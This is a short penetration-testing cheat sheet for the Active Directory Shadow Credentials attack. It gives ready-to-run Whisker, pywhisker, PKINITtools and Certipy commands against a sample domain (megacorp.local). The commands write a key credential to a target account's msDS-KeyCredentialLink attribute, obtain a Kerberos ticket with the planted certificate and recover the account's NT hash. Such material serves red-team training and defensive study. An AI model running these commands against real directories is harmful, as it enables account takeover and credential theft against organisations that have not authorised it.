"...if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user." (Elad Shamir, )
That makes GenericWrite on a user effectively equal to DCSync right on that user.
Check for existence of the msDS-KeyCredentialLink property in LDAP scheme with :
PS > Get-DomainObject -SearchBase CN=Schema,CN=Configuration,DC=megacorp,DC=local -Properties lDAPDisplayName -Where "lDAPDisplayName contains msDS-KeyCredentialLink"
Whisker
List all the values of the the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe list /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
Add a new value to the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe add /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!
Remove a value from the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe remove /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /deviceid:00ff00ff-00ff-00ff-00ff-00ff00ff00ff
Clear all the values of the the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe clear /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
pywhisker
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action add -f sqltest_cert
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action clear
$ python3 gettgtpkinit.py megacorp.local/sqltest -cert-pfx sqltest_cert.pfx -pfx-pass <PFX_PASS> sqltest.ccache
$ KRB5CCNAME=sqltest.ccache python3 getnthash.py megacorp.local/sqltest -key <AES_KEY>
Certipy
$ certipy shadow auto -u svc_mssql@megacorp.local -k -no-pass -account sqltest -target DC01.megacorp.local -dc-ip 192.168.1.11 [-ns 192.168.1.11] [-dns-tcp]
